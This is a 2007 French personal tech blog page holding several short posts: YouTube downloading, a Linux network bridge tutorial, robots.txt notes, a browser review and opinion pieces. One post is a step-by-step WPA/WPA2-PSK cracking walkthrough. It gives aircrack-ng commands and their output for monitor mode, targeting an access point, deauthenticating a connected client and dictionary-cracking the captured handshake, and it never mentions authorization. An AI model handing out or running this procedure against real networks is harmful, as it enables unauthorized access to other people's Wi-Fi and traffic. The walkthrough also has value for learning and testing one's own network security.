SYN, SYN-ACK, ACK …

Steal This Blog

Archives Posts

Youtube

juillet 27th, 2007 by Corbier

Vous connaissez sans doute youtube, c’est sympa y a plein de video etc…
Mais, parfois on aimerait bien télécharger une video que l’on aime bien.

Hé bien c’est possible avec un script en python que j’ai trouvé sur le net.

http://tools.corbier.homelinux.com/youtube-dl.py

Ensuite c’est tout simple vous téléchargez la video comme ceci

python youtube-dl.py http://www.youtube.com/watch?v…

Vous vous retrouvez avec un fichier .flv qu’il vous faut convertir.

apt-get install ffmpeg2theora

ffmpeg2theora fichier.flv ––optimize

et hop comme par magie un fichier .ogg ouvrable avec vlc apparait :p

Filed under Non classé having No Comments »

Archives Posts

Amalgame

juillet 26th, 2007 by Corbier

Avec l’explosion de l’informatique et la geekisation de la populace car oui les gens deviennent de plus en plus geek. Mais pas forcément dans le bon sens. Je me doit d’apporter une précision en citant Denis Bodor (rédacteur en chef de Linux Magazine).

Ainsi, un joueur de Second life est mis dans le même sac que le développeur GNU/Linux ou le tchateur MSN invertébré.[...] La différence est pourtant de taille. Entre un joueur évoluant dans un monde virtuel, abstrait et synthétique, et un utilisateur réactif/productif, il y a un monde, un vrai. Il me paraît important de revendiquer cette particularité. Nous ne sommes pas détachés du monde réel, bien au contraire. Et beaucoup, comme moi, voient dans ces jeux un véritable danger, voire un fléau en puissance. Une simple recherche avec la chaîne World of WarCrack et vous pourrez vous forger votre propre avis. Après tout, le meilleur jeu d’aventure actuellement disponible, c’est la vie elle-même… fût-elle remplie de code, de problèmes et de technologie.

Je suis tout a fait d’accord j’irai même plus loin encore en disant que Internet est devenu une immense cours de récréation. Avec tout les problèmes que ca occasionne. Je dit oui a l’informatique, mais je dis stop a la nianniantisation générale de celle-ci. Avec ces problêmes tout le monde se croit informaticien. Mais l’informatique ne se résoud pas au clic-clic compulsif. Il y a derrière l’expertise que beaucoup on du mal a approché.

Filed under Non classé having No Comments »

Archives Posts

Création d’un pont réseau sous Linux

juillet 25th, 2007 by Corbier

Un pont est un équipement réseau permettant de joindre 2 réseaux différents. Cet équipement agit au niveau 2 de la couche OSI.

Exemple d’architecture :

Réseau 1 eth0 ::::: Pont ::::::: eth1 Réseau 2

Le tutorial ci dessous a été réalisé avec une distribution Debian 2.6.*. Il est adapté à toute peronne ayant des bases sur les systèmes Unix / Linux.

Suivez bien les instructions ci-dessous.

Procédure pour la création du pont :

1) Télécharger le paquet bridge_utils :

apt-get install bridge_utils

2) Configuration des interfaces en prosmisc (attention la connexion se coupera si vous êtes en SSH) :

ifconfig eth0 0.0.0.0 promisc

ifconfig eth1 0.0.0.0 promisc

3) Création du pont (nom du pont : bridge) :

brctl addbr bridge

4) Ajouter les interfaces au pont :

brctl addif bridge eth0
brctl addif bridge eth1

5) Dans le cas où vous souhaitez manager le pont (adresse IP d’exemple : 172.16.1.5)

ifconfig bridge 172.16.1.5 netmask 255.255.255.0

6) Si le réseau est en relation avec un routeur pour sortir vers Internet ou sur un autre réseau, n’oubliez pas de mettre une passerelle par défaut (adresse IP passerelle 172.16.1.1 d’exemple) :


route add default gw 172.16.1.1 netmask 255.255.255.0

7) Le pont est maintenant configuré. Pour voir ses propriétés, tapez la commande :

brctl show

Voilà, le pont est actif. Afin d’automatiser le processus, il est possible de créer un daemon dans /etc/init.d.

Auteur : Julio (julien.chantoiseau@free.fr)

Filed under Non classé having No Comments »

Archives Posts

Référencement

juillet 25th, 2007 by Corbier

Toute personne faisant un site est confronté un jour au référencement. Google fesant désormais les choses à sa sauce et tout les autres moteurs le suivent. J’ai donc largement lu en long et en large les subtilités du référencement.
On nous parle de sitemap, de robots.txt, de metakeys etc …

Je vais déja commencer par le début. Pour référencé son site il évidement du contenu (les billets sont la pour ca). 
Ensuite, il faut un robots.txt a la racine du site web. Je vous laisse jeté un coup d’oeil ici
Voici le mien

User-agent: *
Disallow: /admin

Vous l’aurez sans doute compris j’accepte tout les bots et je refuse l’indexation du dossier /admin

Il faut ensuite un sitemap, un bref séjour sur mon encyclopédie favorite m’en diras plus car c’est vraiment nouveau pour moi. 

Alors c’est la que ca se complique. J’essaie donc par plusieurs moyen de généré ce fameux sitemap. Et c’est l’impasse, comment faire ce fichier ?  Comment le mettre à jour ? etc …

Réponse : Plugin Dotclear 2

Il ne reste donc qu’a attendre.

Donc attendons alors.

Archives Posts

Think Different Think Geek

juillet 23rd, 2007 by Corbier

Je suis allez à Paris ce week end et qu’elle etait ma surprise de découvrir le symbole de linux au pied de la Tour Eiffel

:p

Filed under Linux, drole having No Comments »

Archives Posts

WPA1 / WPA2 PSK / Cracking

juillet 19th, 2007 by Corbier

Dans un premier temps, il faut installer aircrack-ng.

Nous allons passer la carte wifi en mode monitor c’est a dire (la carte écoute tous les paquets wireless même ceux qui ne lui sont pas destiné.)

Pour cela nous utilisons airmon-ng

fluxdeb:~# airmon-ng

usage: airmon-ng <start|stop> <interface> [channel]

Interface Chipset Driver

wifi0 Atheros madwifi-ng

wifi1 Atheros madwifi-ng

1) Passage en mode Monitor

fluxdeb:~# airmon-ng start wifi1

usage: airmon-ng <start|stop> <interface> [channel]

Interface Chipset Driver

wifi0 Atheros madwifi-ng

wifi1 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi1) (monitor mode enabled)

Lors du passage en mode Monitor airmon crée un interface virtuel ath0. J’utiliserai ath0 pour la suite du cracking.

2) Découverte des réseaux.

La commande airodump-ng permet de « sniffer » le réseaux afin de découvrir les réseaux wifi disponible.

L’utilisation sans argument permet l’écoute sur tout les canaux et de tout les SSID.

Notez qu’il est possible d’utiliser deux interfaces pour sniffer doublant ainsi la rapidité d’obtention de packet.

airodump-ng <options> <interface>[,<interface>,...]

CH 10 ][ Elapsed: 16 s ][ 2007-05-10 15:24

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:16:46:C6:2D:B1 31 28 0 0 13 54. WEP WEP XXXXX 00:16:46:C6:2D:B0 32 27 7 0 13 54. WPA2 CCMP PSK XXXXX

BSSID STATION PWR Lost Packets Probes

Voici donc nos deux réseaux, le réseaux que je vais cracker est 00:16:46:C6:2D:B0

On peut voir qu'il envoie sur le channel 13. Je vais donc demander a airodump-ng d'ecouter exclusivement notre réseau.


airodump-ng -c 13 -b 00:16:46:C6:2D:B0 -w psk ath0

-c : channel a écouter

-b : mac adress de l'ap

-w : fichier ou l'on sauvegarde les IVs

ath0 : interface

J'obtiens donc ceci

CH 13 ][ Elapsed: 4 s ][ 2007-05-10 15:32

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:16:46:C6:2D:B0 33 58 71 115 3 13 54. WPA2 CCMP PSK XXXXXX

BSSID STATION PWR Lost Packets Probes

00:16:46:C6:2D:B0 00:0C:F1:04:77:D2 43 0 79

Ce qui est important ici ce sont les stations connectés au point d'accès

Il y a en a 1 qui est associé. (00:16:46:C6:2D:B0)

3) Création de traffic.

Afin d'accélérer la récolte d'information, je vais forcer le client authentifié à générer du traffic en le déassociant du point d'accès. Pour ce faire il faut utiliser aireplay-ng.


aireplay-ng -0 1 -a 00:16:46:C6:2D:B0 -c 00:0C:F1:04:77:D2 ath0

-0 : type d'attaque ( déassotiation )

1 : nombre de déassotiation à envoyer

-a : mac de l'ap

-c : mac du client authentifié


15:46:14 Sending DeAuth to station -- STMAC: [00:0C:F1:04:77:D2]

Ce résultat creé donc du traffic ce qui vas augmenter nos chances de cracker la psk.

4) Cracking de la PSK

Afin de cracker la psk aircrack utilise une attaque par dictionnaire.


aircrack-ng -w dico /home/corbier/psk-0*.cap

-w : dictionnaire

/home/corbier.psk-0*.cap : fichier contenant les IVs

Read 78425 packets.

# BSSID ESSID Encryption

1 00:16:46:C6:2D:B0 XXXXXX WPA (1 handshake)

Index number of target network ? 1

Aircrack-ng 0.6.2

[00:00:00] 56 keys tested (83.64 k/s)

KEY FOUND! [ ??????????? ]

Master Key : 31 96 83 02 6E 0D A7 0B 7C 42 95 E2 13 50 FE 31

1A 25 44 5E C4 6D C5 74 54 B7 1F 37 7F C6 E4 65

Transcient Key : F4 B4 54 7E 5E 1A 49 F4 2F 0E 1B CA 25 C1 22 09

B7 F6 E1 6F 2A 00 B9 F5 31 5D 7D A6 97 9B D1 7B

7C 67 3C 15 FF C1 5B D4 7B 0A D4 18 A1 3C EA C6

F8 7B A2 8C 9E 7F FA D4 C4 92 AF 06 4C 47 06 9A

EAPOL HMAC : FF 23 6C A2 A6 10 FF E0 A9 53 E0 2E 1F 61 44 BB

Et voila

Filed under Linux, Securité, wifi having No Comments »

Archives Posts

Reverse Mode

juillet 19th, 2007 by Corbier

Voici un pdf des plus gros avis de sécurité de l’année 2006, c’est le site reversemode qui propose ce pdf. On peux noter un gros manque de compétance et de réactivité concernant les failles de microsoft.

Bravo a eux pour leurs trois failles non patché qui date repectivement de Mai, Juin, Decembre

Filed under Securité, windows having No Comments »

Archives Posts

Opéra

juillet 19th, 2007 by Corbier

Parfois la nouveauté pointe le bout de son nez la ou on l’attend le moins…

J’ai longtemps crié et hurlé sur mon firefox (qui ma foie fait très bien son travail) à cause de sa lourdeur.

Car il faut le reconnaitre si Firefox est plus sécurisé et plus convivale que IE7, cette sécurité à un prix que les utilisateurs de firefox payent le prix fort. Ce navigateur est d’une lourdeur impressionnante.

Le temps de chargement du navigateur et des pages peuvent vous amener à un ennuie mortelle.

Fort de cette expérience assez déplaisante, je me suis mis dans la tête de changer de navigateur, (un peu comme on changerait de vélo).

Mais voila lequel choisir ?

IE7 ? non non soyons serieux je me voie mal « émuler » IE7 sur ma debian…

Alors j’ai regarder sur mon bureau (le vrai pas celui avec les icones) et la j’ai découvert une pub pour Opéra.

Alors bon je me suis dit installons ce navigateur que j’avais déja tester par le passé.

Et puis Magie !!!!!

Une rapidité folle, des options à gogo, une traduction compléte, un support pour debian Etch,  ce navigateur a décidément tout pour plaire :p

Je vous invite grandement a le tester. Vous en ressortirer content et le plaisir de « surfer » seras au rendez vous.

http://www.opera.com/download/

Filed under browser, opéra, pratique having No Comments »